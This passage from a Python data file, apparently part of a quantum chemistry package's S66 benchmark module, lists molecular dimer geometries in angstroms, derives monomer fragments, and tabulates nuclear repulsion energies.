C 0.75974918 1.03127506 0.37377239
H 1.43501626 1.87566427 0.37470462
C 1.26661779 -0.26736234 0.42127308
H 2.33491597 -0.42918019 0.45943234
C 0.39532054 -1.35599116 0.42490511
H 0.78866193 -2.36249259 0.46303549
C -0.98220564 -1.14665441 0.38127024
H -1.65765632 -1.99114019 0.38512100
C -1.48934612 0.15114979 0.33757234
H -2.55794704 0.31375049 0.30771900
C -0.61877516 1.24033121 0.33388373
H -1.01176161 2.24710690 0.30436922
--
0 1
O 0.04701895 0.30618537 3.68511328
H 0.13311917 0.35605847 2.72791973
C -0.84913165 -0.75142870 3.96816832
H -0.94485234 -0.80816328 5.04910445
H -1.84128123 -0.57973096 3.54437811
H -0.48267133 -1.71446977 3.60525680
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '56')] = qcdb.Molecule("""
0 1
C 0.69231523 1.08829204 0.32484124
H 1.28194880 1.99194678 0.25251578
C 1.31818722 -0.15687008 0.28689607
H 2.39314337 -0.21947636 0.18840681
C 0.55801841 -1.32195045 0.38139986
H 1.04391922 -2.28757380 0.35761542
C -0.82755236 -1.24142187 0.51168501
H -1.41670095 -2.14525152 0.58533927
C -1.45341138 0.00367145 0.54838107
H -2.52823255 0.06570272 0.64984254
C -0.69346094 1.16840108 0.45622907
H -1.17873534 2.13440989 0.48572685
--
0 1
N 0.27506479 -0.22271725 3.85890709
H 0.40968315 -0.17867675 2.85583573
H 0.41655736 0.72242949 4.19137936
C -1.10103469 -0.62910066 4.13634288
H -1.25891125 -0.65764767 5.21289841
H -1.87233687 0.01128013 3.69622388
H -1.25572667 -1.63866846 3.76072118
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '57')] = qcdb.Molecule("""
0 1
C 0.40877989 1.05102502 0.37553605
H 1.01193875 1.94854570 0.36807788
C 1.01916788 -0.19976963 0.28905343
H 2.09557130 -0.27183333 0.21719099
C 0.24172263 -1.35688270 0.29668995
H 0.71521633 -2.32658869 0.22807218
C -1.14617971 -1.26425757 0.39390198
H -1.74918186 -2.16192663 0.39940980
C -1.75727780 -0.01396023 0.48295173
H -2.83351378 0.05824368 0.55903918
C -0.97968602 1.14420653 0.47228370
H -1.45405142 2.11400088 0.53713589
--
0 1
C 0.24562178 1.95675759 4.25663541
H -0.11252332 2.12248844 3.24334264
H 1.27020534 2.31346716 4.33807692
H -0.35847510 2.53039342 4.95498813
C 0.20877544 0.50359448 4.67234424
O 0.49340385 0.15123306 5.81088230
N -0.16361983 -0.36212226 3.69310315
H -0.32474773 -0.00413152 2.76703481
C -0.20041270 -1.78900149 3.91119021
H -0.12232513 -1.95590903 4.98118644
H -1.13565324 -2.20735207 3.54445210
H 0.62871378 -2.29287426 3.41385278
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '58')] = qcdb.Molecule("""
0 1
N -0.94121124 0.79004136 0.01171891
C -0.92275524 -0.55237814 0.03537875
H 0.05724051 -1.01558800 0.05135491
C -2.07651907 -1.33301813 0.03929035
H -1.99652895 -2.41058573 0.05887720
C -3.31631294 -0.70333955 0.01759905
H -4.23157489 -1.27908429 0.01979377
C -3.34889528 0.68701881 -0.00708596
H -4.28544414 1.22610455 -0.02465899
C -2.14310382 1.38263356 -0.00889005
H -2.13809974 2.46565258 -0.02778297
--
0 1
N 2.53321129 -0.95002930 0.04251789
C 3.73499010 -1.54320554 0.04459773
H 3.72976625 -2.62616799 0.06648690
C 4.94092634 -0.84824698 0.02059635
H 5.87736466 -1.38778216 0.02369036
C 4.90860873 0.54205748 -0.00715036
H 5.82398367 1.11730853 -0.02633187
C 3.66892840 1.17234361 -0.00962746
H 3.58915567 2.24990219 -0.03071603
C 2.51501483 0.39233399 0.01556620
H 1.53510443 0.85599657 0.01390336
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '59')] = qcdb.Molecule("""
0 1
C -1.00686722 -0.03056821 -0.02477285
H 0.05900333 -0.06093974 -0.04936562
C -2.21874380 0.00317347 0.00259920
H -3.27927730 0.03352491 0.02720048
--
0 1
O 2.26390460 -0.14557006 -0.11547082
H 2.83426102 -0.73533944 0.38155611
H 2.83590044 0.20541797 -0.80084297
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '60')] = qcdb.Molecule("""
0 1
C -0.61056257 0.22750310 -0.17060207
H 0.10738506 0.86143603 -0.63420924
C -1.38627573 -0.52532550 0.37997353
H -2.08070324 -1.17406739 0.85437937
--
0 1
C 2.83444960 -0.64143137 0.46593603
O 2.58027054 0.31467087 -0.23290172
O 1.88654498 -1.41577160 1.03362263
H 1.02554559 -1.04847261 0.76585149
C 4.21008475 -1.12288120 0.81608694
H 4.94847057 -0.48533112 0.34523661
H 4.33629527 -1.11102648 1.89612226
H 4.33236190 -2.15072575 0.48285261
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '61')] = qcdb.Molecule("""
0 1
C -2.27534498 -0.13507494 0.83133387
H -2.49071776 -0.72792669 -0.05756635
H -2.22632382 -0.81844641 1.67882341
H -3.11202566 0.54494342 0.98740008
C -0.96169812 0.61927789 0.66939920
H -0.78869920 1.25043181 1.54470266
H -1.02617687 1.29544524 -0.18645838
C 0.22650217 -0.31471031 0.47998579
H 0.30944439 -0.97513911 1.34803794
H 0.03915056 -0.96599875 -0.37878983
C 1.54300168 0.42117452 0.26899951
H 1.71163863 1.10777177 1.10244654
H 1.46609466 1.04374331 -0.62529358
C 2.72757633 -0.52686091 0.13745931
H 2.58874155 -1.20321391 -0.70575734
H 3.66150100 0.01169308 -0.01596863
H 2.83519407 -1.13740994 1.03407512
--
0 1
C -0.48356149 -0.28786315 4.12125154
O -0.90617543 -1.40304340 3.92410496
O -1.29725385 0.77110237 4.35384102
H -2.19801596 0.41672183 4.31330528
C 0.95670557 0.12180293 4.13845692
H 1.58252864 -0.74837801 3.98030176
H 1.13274299 0.85607656 3.35533234
H 1.19401682 0.59110388 5.09025931
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '62')] = qcdb.Molecule("""
0 1
C -2.58777605 -0.32310566 0.46945828
H -2.61038910 -0.87636604 -0.46961946
H -2.65974410 -1.05188654 1.27771411
H -3.47603507 0.30562460 0.50896129
C -1.30955982 0.49739424 0.58506260
H -1.31725060 1.08326190 1.50634108
H -1.26237673 1.21557375 -0.23677617
C -0.05682966 -0.36826029 0.55844017
H -0.08617526 -1.07335882 1.39587537
H -0.05380919 -0.97684333 -0.35147393
C 1.23159606 0.44006559 0.63203246
H 1.21328340 1.05356193 1.53459305
H 1.26629733 1.13137662 -0.21310563
C 2.47257523 -0.44314441 0.61922148
H 2.52071888 -1.03526342 -0.29489695
H 3.38773437 0.14408974 0.68390871
H 2.45929703 -1.13936423 1.45861821
--
0 1
C 0.04216222 0.20124208 4.11650819
O 0.06907449 1.38631556 3.82466701
N 1.17474249 -0.55063556 4.21932814
H 2.04568275 -0.12805505 3.95066588
H 1.13580453 -1.54252223 4.35075106
C -1.24805876 -0.53769541 4.38096202
H -1.10080876 -1.49841677 4.86808639
H -1.75428629 -0.69600434 3.43014867
H -1.88600271 0.08954102 4.99623387
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '63')] = qcdb.Molecule("""
0 1
C 0.60678496 1.33042185 0.31643451
H 1.24649846 2.20226434 0.33035231
C 1.11808466 0.08724886 0.68511652
H 2.15005753 -0.00388678 0.99375824
C 0.29290229 -1.03608737 0.66910727
H 0.68849686 -2.00096149 0.95537797
C -1.04283174 -0.91671112 0.28818964
H -1.68270956 -1.78848825 0.27934903
C -1.55358838 0.32734899 -0.07994317
H -2.58923495 0.42028908 -0.37734619
C -0.72804164 1.45084316 -0.06684834
H -1.12362379 2.41565865 -0.35386143
--
0 1
C 0.41898688 -0.27167884 4.02497697
O 1.61447955 -0.10772809 4.10149274
O -0.16051479 -1.48308380 4.22441532
H 0.57393607 -2.08419229 4.41745344
C -0.60289735 0.77225268 3.70429579
H -0.12460293 1.74319903 3.65747301
H -1.05569745 0.53905649 2.74158774
H -1.38774836 0.76671618 4.45679527
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '64')] = qcdb.Molecule("""
0 1
C 1.62971482 0.50301252 0.27011189
H 1.64157338 1.45923792 -0.24808286
H 2.31531919 -0.18355470 -0.21758635
H 1.96974564 0.64936024 1.29398105
C 0.26182776 -0.13286122 0.31456221
O 0.09925265 -1.30961602 0.61183995
N -0.77350225 0.70251214 0.02207590
H -0.56901138 1.66655677 -0.16581434
C -2.15001214 0.26596865 0.09505328
H -2.14473761 -0.81940745 0.10091210
H -2.64054318 0.61582035 1.00360442
H -2.70774393 0.62075110 -0.76826057
--
0 1
C -0.04575608 0.51799706 3.77621664
H -0.05063764 1.26017087 4.56209922
H -0.69428883 0.68576570 2.92753308
C 0.72275422 -0.56896486 3.84602626
H 1.36805919 -0.74079051 4.69615412
H 0.71764224 -1.30416499 3.05371698
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '65')] = qcdb.Molecule("""
0 1
N -0.08303249 0.00071459 1.05519999
C -0.20285376 -1.14172585 0.36493369
H -0.09848563 -2.05509795 0.93743262
C -0.44678144 -1.19176367 -1.00451226
H -0.53364921 -2.14585511 -1.50417155
C -0.57468209 0.00343953 -1.70430948
H -0.76368391 0.00448010 -2.76872670
C -0.45345675 1.19724254 -1.00091647
H -0.54563080 2.15227264 -1.49779508
C -0.20931111 1.14450759 0.36836730
H -0.11016707 2.05669726 0.94357396
--
0 1
C 0.47183602 -0.00605819 5.54171896
H 0.58724607 -0.00548400 6.59673278
C 0.33976626 -0.00660792 4.33547166
H 0.22161814 -0.00634549 3.27096619
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '66')] = qcdb.Molecule("""
0 1
N -0.54105920 0.02957620 -0.20899508
H 0.05555335 -0.78611810 -0.13029335
H -1.46966940 -0.27470845 0.05314338
C -0.07879927 1.04239036 0.73845886
H -0.72015294 1.91941377 0.67198026
H -0.05075819 0.72382293 1.78551453
H 0.92643072 1.35660379 0.46199919
--
0 1
N 2.34185022 -1.25680010 0.03015300
C 2.68028654 -0.44445604 -0.98155948
H 2.13761932 -0.58899402 -1.90694084
C 3.65161580 0.54767776 -0.88119247
H 3.87646824 1.17201804 -1.73404317
C 4.31245587 0.71721920 0.33107196
H 5.07030981 1.47945653 0.44745609
C 3.97232296 -0.11774333 1.39019492
H 4.45491136 -0.02728109 2.35289557
C 2.98854139 -1.08253234 1.19101154
H 2.70245706 -1.74627994 1.99762219
units angstrom
""")
# <<< Derived Geometry Strings >>>
for rxn in HRXN:
GEOS['%s-%s-monoA-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1)
GEOS['%s-%s-monoB-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2)
GEOS['%s-%s-monoA-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1, 2)
GEOS['%s-%s-monoB-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2, 1)
#########################################################################
# <<< Supplementary Quantum Chemical Results >>>
DATA = {}
DATA['NUCLEAR REPULSION ENERGY'] = {}
DATA['NUCLEAR REPULSION ENERGY']['S66-1-dimer' ] = 36.51369349
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoA-unCP' ] = 9.15671411
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoB-unCP' ] = 9.17259114
DATA['NUCLEAR REPULSION ENERGY']['S66-2-dimer' ] = 79.98338083
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoA-unCP' ] = 9.14996836
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoB-unCP' ] = 40.29463192
DATA['NUCLEAR REPULSION ENERGY']['S66-3-dimer' ] = 79.77996002
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoA-unCP' ] = 9.12565570
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoB-unCP' ] = 42.06267577
DATA['NUCLEAR REPULSION ENERGY']['S66-4-dimer' ] = 246.86074225
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoA-unCP' ] = 9.13184124
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoB-unCP' ] = 180.56084030
DATA['NUCLEAR REPULSION ENERGY']['S66-5-dimer' ] = 129.52156842
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoA-unCP' ] = 40.41731272
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoB-unCP' ] = 40.29806380
DATA['NUCLEAR REPULSION ENERGY']['S66-6-dimer' ] = 131.81617640
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoA-unCP' ] = 40.42467073
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoB-unCP' ] = 42.05202847
DATA['NUCLEAR REPULSION ENERGY']['S66-7-dimer' ] = 313.95975412
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoA-unCP' ] = 40.41876218
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoB-unCP' ] = 180.73873695
DATA['NUCLEAR REPULSION ENERGY']['S66-8-dimer' ] = 78.74537406
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoA-unCP' ] = 40.42326344
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoB-unCP' ] = 9.17236900
DATA['NUCLEAR REPULSION ENERGY']['S66-9-dimer' ] = 129.31867271
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoA-unCP' ] = 42.10593235
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoB-unCP' ] = 40.34710761
DATA['NUCLEAR REPULSION ENERGY']['S66-10-dimer' ] = 131.71717765
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoA-unCP' ] = 42.09217552
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoB-unCP' ] = 42.05982938
DATA['NUCLEAR REPULSION ENERGY']['S66-11-dimer' ] = 320.50976921
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoA-unCP' ] = 42.09328618
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoB-unCP' ] = 180.72211450
DATA['NUCLEAR REPULSION ENERGY']['S66-12-dimer' ] = 81.87844165
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoA-unCP' ] = 42.04336531
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoB-unCP' ] = 9.12312499
DATA['NUCLEAR REPULSION ENERGY']['S66-13-dimer' ] = 314.84789007
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoA-unCP' ] = 180.80545988
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoB-unCP' ] = 40.30378877
DATA['NUCLEAR REPULSION ENERGY']['S66-14-dimer' ] = 315.64348724
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoA-unCP' ] = 180.81499576
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoB-unCP' ] = 42.03791353
DATA['NUCLEAR REPULSION ENERGY']['S66-15-dimer' ] = 540.42243680
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoA-unCP' ] = 180.53794513
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoB-unCP' ] = 180.54327910
DATA['NUCLEAR REPULSION ENERGY']['S66-16-dimer' ] = 243.51194018
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoA-unCP' ] = 180.57089645
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoB-unCP' ] = 9.17374713
DATA['NUCLEAR REPULSION ENERGY']['S66-17-dimer' ] = 1040.55250335
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoA-unCP' ] = 357.25263911
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoB-unCP' ] = 357.22824169
DATA['NUCLEAR REPULSION ENERGY']['S66-18-dimer' ] = 269.39653929
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoA-unCP' ] = 9.12915636
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoB-unCP' ] = 206.28546361
DATA['NUCLEAR REPULSION ENERGY']['S66-19-dimer' ] = 337.49486033
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoA-unCP' ] = 40.42190801
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoB-unCP' ] = 206.28426737
DATA['NUCLEAR REPULSION ENERGY']['S66-20-dimer' ] = 381.47467603
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoA-unCP' ] = 121.35354216
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoB-unCP' ] = 121.35037507
DATA['NUCLEAR REPULSION ENERGY']['S66-21-dimer' ] = 373.66110820
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoA-unCP' ] = 121.85534909
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoB-unCP' ] = 121.85562743
DATA['NUCLEAR REPULSION ENERGY']['S66-22-dimer' ] = 685.96293615
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoA-unCP' ] = 121.30606379
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoB-unCP' ] = 357.30242624
DATA['NUCLEAR REPULSION ENERGY']['S66-23-dimer' ] = 682.46450694
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoA-unCP' ] = 121.91206440
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoB-unCP' ] = 357.16987646
DATA['NUCLEAR REPULSION ENERGY']['S66-24-dimer' ] = 623.71187998
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoA-unCP' ] = 203.71200257
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoB-unCP' ] = 203.71172379
DATA['NUCLEAR REPULSION ENERGY']['S66-25-dimer' ] = 637.14156863
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoA-unCP' ] = 206.22564193
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoB-unCP' ] = 206.22748415
DATA['NUCLEAR REPULSION ENERGY']['S66-26-dimer' ] = 1163.54572871
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoA-unCP' ] = 357.16027337
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoB-unCP' ] = 357.16027370
DATA['NUCLEAR REPULSION ENERGY']['S66-27-dimer' ] = 630.67443466
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoA-unCP' ] = 203.68422363
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoB-unCP' ] = 206.25955744
DATA['NUCLEAR REPULSION ENERGY']['S66-28-dimer' ] = 878.32907732
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoA-unCP' ] = 203.65134501
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoB-unCP' ] = 357.16948119
DATA['NUCLEAR REPULSION ENERGY']['S66-29-dimer' ] = 885.28192562
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoA-unCP' ] = 206.16040036
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoB-unCP' ] = 357.23565563
DATA['NUCLEAR REPULSION ENERGY']['S66-30-dimer' ] = 327.62509332
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoA-unCP' ] = 203.74228045
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoB-unCP' ] = 33.43000301
DATA['NUCLEAR REPULSION ENERGY']['S66-31-dimer' ] = 518.26358403
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoA-unCP' ] = 357.18726739
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoB-unCP' ] = 33.40409180
DATA['NUCLEAR REPULSION ENERGY']['S66-32-dimer' ] = 495.33117294
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoA-unCP' ] = 357.24995067
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoB-unCP' ] = 24.63459975
DATA['NUCLEAR REPULSION ENERGY']['S66-33-dimer' ] = 332.11307535
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoA-unCP' ] = 206.29228895
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoB-unCP' ] = 33.42391806
DATA['NUCLEAR REPULSION ENERGY']['S66-34-dimer' ] = 577.94330068
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoA-unCP' ] = 185.63664994
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoB-unCP' ] = 185.63558546
DATA['NUCLEAR REPULSION ENERGY']['S66-35-dimer' ] = 574.13141612
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoA-unCP' ] = 185.63471242
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoB-unCP' ] = 199.36895747
DATA['NUCLEAR REPULSION ENERGY']['S66-36-dimer' ] = 573.01241887
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoA-unCP' ] = 199.35493735
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoB-unCP' ] = 199.35496470
DATA['NUCLEAR REPULSION ENERGY']['S66-37-dimer' ] = 569.42803611
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoA-unCP' ] = 188.28929834
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoB-unCP' ] = 199.34481507
DATA['NUCLEAR REPULSION ENERGY']['S66-38-dimer' ] = 562.36494675
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoA-unCP' ] = 188.38358820
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoB-unCP' ] = 188.37865241
DATA['NUCLEAR REPULSION ENERGY']['S66-39-dimer' ] = 594.82529945
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoA-unCP' ] = 203.67735882
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoB-unCP' ] = 188.40454306
DATA['NUCLEAR REPULSION ENERGY']['S66-40-dimer' ] = 598.08168004
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoA-unCP' ] = 203.68538784
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoB-unCP' ] = 199.37329650
DATA['NUCLEAR REPULSION ENERGY']['S66-41-dimer' ] = 843.32242800
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoA-unCP' ] = 357.06617642
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoB-unCP' ] = 185.61673585
DATA['NUCLEAR REPULSION ENERGY']['S66-42-dimer' ] = 830.51659591
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoA-unCP' ] = 357.04169352
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoB-unCP' ] = 188.33728572
DATA['NUCLEAR REPULSION ENERGY']['S66-43-dimer' ] = 830.36688604
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoA-unCP' ] = 357.12713115
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoB-unCP' ] = 199.36153551
DATA['NUCLEAR REPULSION ENERGY']['S66-44-dimer' ] = 303.64951312
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoA-unCP' ] = 33.42556566
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoB-unCP' ] = 185.65594848
DATA['NUCLEAR REPULSION ENERGY']['S66-45-dimer' ] = 285.69697355
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoA-unCP' ] = 24.64923587
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoB-unCP' ] = 185.73197134
DATA['NUCLEAR REPULSION ENERGY']['S66-46-dimer' ] = 576.36980953
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoA-unCP' ] = 180.49044991
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoB-unCP' ] = 185.67687994
DATA['NUCLEAR REPULSION ENERGY']['S66-47-dimer' ] = 592.90348525
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoA-unCP' ] = 203.66921988
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoB-unCP' ] = 203.67694204
DATA['NUCLEAR REPULSION ENERGY']['S66-48-dimer' ] = 601.34387795
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoA-unCP' ] = 206.19608668
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoB-unCP' ] = 206.19869697
DATA['NUCLEAR REPULSION ENERGY']['S66-49-dimer' ] = 596.54644729
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoA-unCP' ] = 203.65045916
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoB-unCP' ] = 206.22459403
DATA['NUCLEAR REPULSION ENERGY']['S66-50-dimer' ] = 300.96547874
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoA-unCP' ] = 203.65156163
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoB-unCP' ] = 24.63554547
DATA['NUCLEAR REPULSION ENERGY']['S66-51-dimer' ] = 73.51391626
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoA-unCP' ] = 24.65072244
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoB-unCP' ] = 24.64312912
DATA['NUCLEAR REPULSION ENERGY']['S66-52-dimer' ] = 488.72204285
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoA-unCP' ] = 203.60587521
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoB-unCP' ] = 121.22680816
DATA['NUCLEAR REPULSION ENERGY']['S66-53-dimer' ] = 475.54833273
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoA-unCP' ] = 203.61290966
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoB-unCP' ] = 121.83743933
DATA['NUCLEAR REPULSION ENERGY']['S66-54-dimer' ] = 274.02041197
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoA-unCP' ] = 203.63390042
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoB-unCP' ] = 9.16766818
DATA['NUCLEAR REPULSION ENERGY']['S66-55-dimer' ] = 349.34385129
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoA-unCP' ] = 203.62143957
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoB-unCP' ] = 40.41522246
DATA['NUCLEAR REPULSION ENERGY']['S66-56-dimer' ] = 347.25412940
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoA-unCP' ] = 203.65859480
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoB-unCP' ] = 42.10725315
DATA['NUCLEAR REPULSION ENERGY']['S66-57-dimer' ] = 584.88796485
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoA-unCP' ] = 203.60060155
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoB-unCP' ] = 180.55180987
DATA['NUCLEAR REPULSION ENERGY']['S66-58-dimer' ] = 577.23538658
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoA-unCP' ] = 206.16864626
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoB-unCP' ] = 206.16860003
DATA['NUCLEAR REPULSION ENERGY']['S66-59-dimer' ] = 53.29797952
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoA-unCP' ] = 24.62604423
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoB-unCP' ] = 9.17684034
DATA['NUCLEAR REPULSION ENERGY']['S66-60-dimer' ] = 206.60195669
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoA-unCP' ] = 24.62574637
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoB-unCP' ] = 121.22795347
DATA['NUCLEAR REPULSION ENERGY']['S66-61-dimer' ] = 475.00612950
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoA-unCP' ] = 185.62492607
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoB-unCP' ] = 121.23972648
DATA['NUCLEAR REPULSION ENERGY']['S66-62-dimer' ] = 478.48168724
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoA-unCP' ] = 185.65184859
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoB-unCP' ] = 121.86597939
DATA['NUCLEAR REPULSION ENERGY']['S66-63-dimer' ] = 496.78090588
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoA-unCP' ] = 203.66095658
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoB-unCP' ] = 121.23566219
DATA['NUCLEAR REPULSION ENERGY']['S66-64-dimer' ] = 300.38789564
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoA-unCP' ] = 180.56185111
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoB-unCP' ] = 33.41895147
DATA['NUCLEAR REPULSION ENERGY']['S66-65-dimer' ] = 292.14525417
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoA-unCP' ] = 206.26607138
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoB-unCP' ] = 24.59915901
DATA['NUCLEAR REPULSION ENERGY']['S66-66-dimer' ] = 349.09867633
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoA-unCP' ] = 42.09376472
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoB-unCP' ] = 206.23491680
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoA-CP' ] = 9.15671411
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoB-CP' ] = 9.17259114
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoA-CP' ] = 9.14996836
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoB-CP' ] = 40.29463192
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoA-CP' ] = 9.12565570
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoB-CP' ] = 42.06267577
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoA-CP' ] = 9.13184124
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoB-CP' ] = 180.56084030
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoA-CP' ] = 40.41731272
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoB-CP' ] = 40.29806380
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoA-CP' ] = 40.42467073
